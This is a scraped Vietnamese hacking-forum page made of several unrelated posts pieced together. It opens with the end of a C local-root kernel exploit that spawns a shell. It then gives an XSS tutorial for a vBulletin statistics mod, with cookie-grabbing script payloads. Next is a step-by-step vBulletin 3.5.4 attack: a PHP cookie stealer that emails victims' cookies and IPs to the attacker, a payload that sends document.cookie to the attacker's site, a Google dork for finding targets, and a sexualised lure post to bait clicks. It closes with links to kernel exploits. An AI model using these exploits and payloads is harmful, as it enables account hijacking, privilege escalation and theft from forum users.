} asm("lcall $" str(GATE) ",$0x0"); /* this is it */ } void shell(void) { char * argv[] = { _PATH_BSHELL, NULL }; execve(_PATH_BSHELL, argv, environ); fatal("Unable to spawn shell\n"); } void remap(void) { static char stack[8 MB]; /* new stack */ static char * envp[] = { "PATH=" _PATH_STDPATH, NULL }; static unsigned * m; static unsigned b; m = (unsigned *) sbrk(map_size); if (!m) fatal("Unable to allocate memory"); environ = envp; asm ("movl %0, %%esp\n" : : "a" (stack + sizeof(stack))); b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK; if (munmap((void*)b, task_size - b) == -1) fatal("Unable to unmap stack"); while (b < task_size) { if (sbrk(PAGE_SIZE) == NULL) fatal("Unable to expand BSS"); b += PAGE_SIZE; } ldt(m); expand(); knockout(); shell(); } int main(void) { configure(); remap(); return EXIT_FAILURE; } Trích: Cái giữ quyên truy cập mình mong ai thao thì chỉ giáo thêm được thi tôt quá Lão kilua đâu rồi nhỉ :p dinhcaohack (vniss) VBB với html Injection và XSS Hỗm rày rấy lên tin vBB có bug ở mod Xtop Statistic cho nên hum nay Navaro xin nói một tí về nóa, bài viết nài do newbie viết cho newbie ai pro đọc xong đường cười nghem :mad: Một chút mô tả : Cái mà anh em gọi là bug thật ra không phải bug gì hết mà do tác giả cố tình không chuyển title (các tab html) của bài viết sang html thuần như các kí tự sau : Trích: '&' (ampersand) becomes '&' '"' (double quote) becomes '"' when ENT_NOQUOTES is not set. ''' (single quote) becomes ''' only when ENT_QUOTES is set. '<' (less than) becomes '<' '>' (greater than) becomes '>' Để thấy rõ điều này anh em hãy "lật" file topXstats.php ra nhé và chú ý đoạn này : Trích: while ($getstats_thread = $db->fetch_array($getstats_threads)) { $getstats_thread[title] =unhtmlspecialchars($getstats_thread[title]); } Tác giả dùng hàm unhtmlspecialchars(), hàm này ngược với hàm htmlspecialchars(), hàm htmlspecialchars() sẽ trả biến về dạng html thuần. "Hò dài dòng quá, vậy thì làm sao ?" Có anh em đang gắt Vâng, chính vì thế liệu chúng ta post 1 bài mới toanh với tựa đề là một tab html gì gì đó, giờ Navaro test thử cái nề : "><font color=red>test</font><", đóa post nguyên cái đóa vài title nghem . Ok, giờ chạy ra index xem chuyện dề sảy ra, ác sao lại có chữ test màu đỏ thế kia ? Dê dê, giờ view code ra coi nhé Trích: <a href="showthread.php?goto=newpost&t=7" title="Go to first unread post in thread "><font color=red>test</font><""> </a> Ồ thì ra là thế, mà tại sao là "><font color=red>test</font><" trong cứ ngồ ngộ thía náo á, hehe. Là thía nài, tại sao lại có "> <" ở 2 bên thía, cái này dùng để "vô hiệu hóa" cái title của tab <a>, giờ nó trở thành là title="Go to "><font color=red> roài dề dề đóa Giờ làm gì nữa, với cái này chúng ta có thể nghịch một chút, làm cho vbb nhỏng nhẻo một tí , tiếp theo thử dùng tab meta để direct sang một site nào đó : hoặc cũng có thể lấy cookie, cón lấy làm dề thì tùy anh êm, có thể lấy chơi cho dui cũng được mòa , đề lấy cookie thì dùng cái này : "><script>alert(document.cookie);</script><" để post vào title nhé . Hoặc có thể dùng "><script>document.write(document.cookie);</script>" nếu bạn thấy cách kia phiền phức - Còn để fix cái "bug" này thì cực dễ anh em chỉ thần xóa đi chử unhtmlspecialchars thành htmlspecialchars ( ngây chỗ bôi đỏ í). =======Hết Phim======= navaro(HCE) vbulletin 3.5.4 Exploiting Step 1. Make a file called "exploit.php". Step 2. Fill the file with this code: Trích: <?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip è: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> <a href="log.php"></a><? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $cookie = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss Vbulletin" ; $message = "Xss: Hacking Ip: $ip_adresse Cookie: $cookie Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?> Step 3. Find the line: Trích: <?php $myemail = "YOUR ADDRESS E-MAIL"; Step 4a. Replace "YOUR ADDRESS E-MAIL" with your real e-mail address. Step 4b. Leave the file in a handy place, like your desktop. Step 5. Make a new *.txt-file Step 6. Fill the file with this code: Trích: <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > Step 7. Find the line: Trích: location="http://YOUR ADDRESS WEB.com Step 8. And replace "YOUR ADDRESS WEB.com" with your site + subdomains and where to find exploit. Like: http://www.host.com/hacking/exploit.php Step 9. Rename the *.txt-file to: "image.gif", make sure you don't have the *.txt at the end, like image.gif.txt. Step 10. If you have read well (and do well) you have now a file called exploit.php and a file called image.gif Step 11. Upload the 2 files to your site, in exactly your subdomains, etc. as you did in step 8! Step 12. Search on google for "powered by vbulletin 3.5.4". Like a did: Trích: http://www.google.com/search?q=%22po la:nl:official Step 13. If you have found any forum of this type register a new account. (if you haven't did that already) Step 14. Post a new tread and make a little story, like: "I have worked in Angelina Jolie's house as a gardener, now I have special pics of her, bathing in the sun. With the tits (you can guess that!) Here is one image, I'm posting the others tomorrow." Step 15. Now post a link to your site where the image is. Step 16. Post the tread Step 17. Wait for any dumbass to click the link. Step 18. If it is good you get a cookie data of an account which is also registered in the forum. Step 19. HAPPY HACKING! Zeof(vniss) all kernel exploit Exploit Kernel Local Root 2.4.17 http://www.worlddefacers.de/local/newlocal http://www.worlddefacers.de/local/kmod http://www.worlddefacers.de/local/2.4-k.zip